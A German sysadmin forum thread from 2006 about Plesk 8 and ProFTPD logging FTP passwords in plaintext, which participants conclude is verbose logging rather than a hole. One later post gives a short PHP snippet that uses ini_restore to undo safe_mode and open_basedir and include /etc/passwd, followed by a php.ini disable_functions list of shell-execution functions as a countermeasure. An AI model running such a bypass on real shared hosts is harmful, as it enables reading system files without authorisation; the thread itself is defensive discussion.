RootForum Community

Resources for System-Administrators
https://www.rootforum.org/forum/

Sicherheitslücke in Plesk und/oder ProFTP?

https://www.rootforum.org/forum/viewtopic.php?t=42212

Page 1 of 1

Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-08-27 11:17
by baddy0815
Guten Morgen!

Ich hab heute morgen seltsame Einträge in meiner messages gefunden. Kann jemand dazu was sagen? Interessant ist, dass tatsächlich das korrekte (jetzt geänderte) Passwort angezeigt wird!

Code: Select all

Aug 26 20:03:31 hostname proftpd[22327]: hostname.serverkompetenz.net (84.XXX.XXX.XXX[84.XXX.XXX.XXX]) - FTP session opened.
Aug 26 20:03:31 hostname proftpd[22327]: hostname.serverkompetenz.net (84.XXX.XXX.XXX[84.XXX.XXX.XXX]) - mod_delay/0.5: delaying for 202 usecs
Aug 26 20:03:31 hostname proftpd[22327]: hostname.serverkompetenz.net (84.XXX.XXX.XXX[84.XXX.XXX.XXX]) - no such user 'anonymous'
Aug 26 20:04:00 hostname proftpd: Authentication started for user vorhandeneruser
Aug 26 20:04:00 hostname proftpd: Plesk DB connection established successfully
Aug 26 20:04:00 hostname proftpd: Querying SELECT password, type FROM psa.accounts as a, psa.sys_users AS s WHERE a.id = s.account_id AND s.login='vorhandeneruser'
Aug 26 20:04:00 hostname proftpd: Connection to the Plesk DB closed
Aug 26 20:04:00 hostname proftpd: user's password='daskorrektepasswort', passlen='7', type='plain'
Aug 26 20:04:00 hostname proftpd: _get_stacked_password(pamh, flags=32768, opts=8, type=6, &password)
Aug 26 20:04:00 hostname proftpd: entered_password='daskorrektepasswort'
Aug 26 20:04:47 hostname proftpd[22331]: hostname.serverkompetenz.net (84.XXX.XXX.XXX[84.XXX.XXX.XXX]) - FTP session opened.
Aug 26 20:04:47 hostname proftpd[22331]: hostname.serverkompetenz.net (84.XXX.XXX.XXX[84.XXX.XXX.XXX]) - mod_delay/0.5: delaying for 251 usecs
Das kann doch nicht korrekt sein?? Im Plesk-Forum ist das nicht beschrieben, googeln war auch erfolglos??

Mein System:
Betriebssystem Linux 2.6.11.4-21.13-default
PleskVersion psa v8.0.1_build80060728.17 os_SuSE 9.3

Bin ratlos!
Gruß
Christian

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-08-27 11:21
by os-t
Irgendjemand (Du selbst?) hat sich per FTP mit einem gültigen User und einem gültigen Passwort eingeloggt... wieso sollte das eine Sicherheitslücke sein?
Entweder jemand hat das PWD und den User erraten (oder per Brute Force rausgekitzelt) oder derjenige hatte das Passwort einfach (was ebenfalls keine Sicherheitslücke darstellt)...

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-08-27 11:30
by baddy0815
Nee, die Einträge bei einem normalen Login sehen anders aus! Da wird auch vor allem nicht das Passwort im Klartext in die Logdatei geschrieben!

Es betrifft vier User - drei davon werden ausschliesslich von mir benutzt und ich habe mich nicht eingeloggt!

Für mich sieht das nach ner Datenbankabfrage aus, die das Passwort anzeigen lässt!

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-08-27 11:41
by os-t
Hi,

ja aber das ist bei Plesk immer so, denn die Passwörter für den Plesk-User stehen nunmal in der MySQL-DB und dieser Select ist die Authentication gegen die DB...
Dass Plesk den Select inkl. Passwort in die DB schreibt ist zwar nicht so sonderlich prickelnd, aber zumindest keine echte Lücke.

Gruß Markus

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-08-27 12:09
by baddy0815
Hallo Markus!

Danke, für den Tipp - so hab ich das jetzt auch nachvollziehen können... Prickelnd ist das tatsächlich nicht, aber zumindestens kann ich mich jetzt einigermassen beruhigt zurücklehnen...

Gruß
Christian

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-08-27 12:18
by baddy0815
Kleine Ergänzung:

Das "Problem" der im Klartext angezeigten Passwörter in der messages scheint erst seit Plesk 8 zu bestehen - vorher war das nicht so (deshalb ist es mir auch erst heute aufgefallen...)

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-10-06 10:20
by derfalk
Das "schöne" an der Sache ist auch noch folgende "Schwachstelle":

Schreibt mal in ein test.php folgendes rein:

Code: Select all

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
und führt diese von einer Eurer Webs aus...

und siehe da: .... :twisted:

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-10-06 10:23
by baddy0815
Uhaaa... Ich machs nicht, aber ich kanns mehr sehr gut vorstellen :-(

Hat SWsoft da schonmal irgendwo was drüber geschrieben?

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-10-06 10:55
by derfalk
also die Messages ging zum Glück nicht :oops:

Aber man kann sich mal "durchtesten" ... da bekommt man schon kalte Füsse :(

das was man dagegen machen kann ist in der php.ini:

Code: Select all

disable_functions =
wordwrap,phpinfo,phpcredits,escapeshellarg,escapeshellcmd,exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,virtual,ini_set,ini_alter,ini_restore,set_include_path,php_ini_scanned_files,memory_get_usage

Re: Sicherheitslücke in Plesk und/oder ProFTP?

Posted: 2006-10-06 11:23
by rudi
derfalk wrote:

Code: Select all

disable_functions =
wordwrap,phpinfo,phpcredits,escapeshellarg,escapeshellcmd,exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,virtual,ini_set,ini_alter,ini_restore,set_include_path,php_ini_scanned_files,memory_get_usage
Da kannst auch noch gleich "symlink" mit aufnehmen - sie neuer open_basedir Bug.
All times are UTC+02:00
Page 1 of 1